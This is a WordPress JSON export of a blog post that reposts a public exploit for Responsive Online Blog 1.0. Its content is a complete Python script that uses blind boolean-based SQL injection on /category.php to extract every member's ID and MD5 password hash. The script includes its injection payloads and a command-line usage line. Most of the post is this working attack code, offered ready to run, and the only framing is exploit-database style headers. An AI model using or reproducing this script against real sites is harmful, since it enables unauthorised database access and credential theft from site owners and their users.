{"id":23381,"date":"2022-04-19T19:29:54","date_gmt":"2022-04-19T15:29:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166767\/rob10-sql.txt"},"modified":"2022-05-09T07:52:43","modified_gmt":"2022-05-09T03:22:43","slug":"responsive-online-blog-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/responsive-online-blog-1-0-sql-injection\/","title":{"rendered":"Responsive Online Blog 1.0 SQL Injection"},"content":{"rendered":"

# Exploit Title: Responsive Online Blog 1.0 – Blind Boolean-based SQLi
\n# Date: 2022-04-16
\n# Exploit Author: Gideon Kamioka (@w1ezl)
\n# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/14194\/responsive-online-blog-website-using-phpmysql.html
\n# Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
\n# Version: v1.0
\n# Tested on: XAMPP Linux\/7.4.7<\/p>\n

# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack,
\n# which can provide attackers with access to the username and md5 hash of all site users.
\n# Vulnerable file: \/category.php<\/p>\n

# Usage: python3 exploit.py http:\/\/localhost\/blog\/category.php<\/p>\n

# Proof of Concept:<\/p>\n

#!\/usr\/bin\/python3<\/p>\n

import sys,requests,re<\/p>\n

def cred_Length(ip,p,max):
\nf = requests.get(ip, params=f’id={p.replace(“[i]”,str(125))}’, verify=False)
\nfailLen=len(f.text)<\/p>\n

for k in reversed(range(1,max)):
\nr = requests.get(ip, params=f’id={p.replace(“[i]”,str(k))}’, verify=False)
\nif (len(r.text) != failLen):
\nreturn k
\nreturn None<\/p>\n

def search_Credentials(ip, p):
\ncharlist=”abcdefghijklmnopqrstuvwxyz0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ!\\”#$%&\\\\\\'()*+,-.\/:;<=>?@{|}~[]^_`”
\nf = requests.get(ip, params=f’id={p.replace(“[CHAR]”,str(125))}’, verify=False)
\nfailLen=len(f.text)<\/p>\n

for k in charlist:
\nr = requests.get(ip, params=f’id={p.replace(“[CHAR]”,str(ord(k)))}’, verify=False)
\nif (len(r.text) != failLen):
\nreturn ord(k)
\nreturn None<\/p>\n

def logo():
\nart = R”’
\n\u2591\u2591\u2591\u2591 \u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591 \u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591 \u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\n”’
\ninfo = “\\033[0;34mResponsive Online Blog 1.0 \/category.php\\033[0m -\\n Boolean based Blind Credential Extractor”
\ncredits = ‘Created by \\033[1;35m@w1ezl\\033[0m’.center(80)
\nwarning= “\\033[3mThis script could take up to \\033[1;31;103m10 minuites\\033[0m\\033[3m to extract a single credential.\\nGo get cofee and chill or something.\\033[0m”
\nprint(f”{art}\\n{info}\\n{credits}\\n\\n{warning}\\n\\n”)<\/p>\n

def main():
\nlogo()<\/p>\n

if len(sys.argv) != 2:
\nprint(f”(+) Usage python3 {sys.argv[0]} <target>”)
\nprint(f”(+) Eg: python3 {sys.argv[0]} http:\/\/localhost\/blog\/category.php”)
\nsys.exit(-1)<\/p>\n

target = sys.argv[1]\npayloadA = “1’AND+(SELECT+count(*)+FROM+membership_users)=[i]–+-”
\npayloadB = “1’AND+length(substring((SELECT+CONCAT(memberID,’:’,passMD5)+FROM+membership_users+LIMIT+1+OFFSET+[o]),1,60))=[i]–+-”
\npayloadC = “1’AND+ascii(substring((SELECT+CONCAT(memberID,’:’,passMD5)+FROM+membership_users+LIMIT+1+OFFSET+[o]),[i],1))=[CHAR]–+-”
\nprint(“(+) Starting Exploit:”)<\/p>\n

n = cred_Length(target, payloadA, 30)<\/p>\n

if n is None:
\nprint(“(+) No creds Found:”)
\nprint(“(+) exiting…”)
\nsys.exit(-1)
\nelse:
\nprint(f”(+) {n-1} creds Found:”)<\/p>\n

for i in range(0,n-1):
\nb = payloadB.replace(“[o]”,str(i))
\ncredLen = cred_Length(target, b, 60)<\/p>\n

for j in range (1, credLen+1):
\np = payloadC.replace(“[i]”,str(j))
\nc = p.replace(“[o]”,str(i))
\nsys.stdout.write(chr(search_Credentials(target, c)))
\nsys.stdout.flush()
\nprint(”)
\nprint(“done”)<\/p>\n

if __name__ == ‘__main__’:
\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Responsive Online Blog 1.0 – Blind Boolean-based SQLi # Date: 2022-04-16 # Exploit Author: Gideon Kamioka (@w1ezl) # Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/14194\/responsive-online-blog-website-using-phpmysql.html # Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL # Version: v1.0 # Tested on: XAMPP Linux\/7.4.7 # Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, # which can provide attackers with access …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23381","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23381"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23381\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}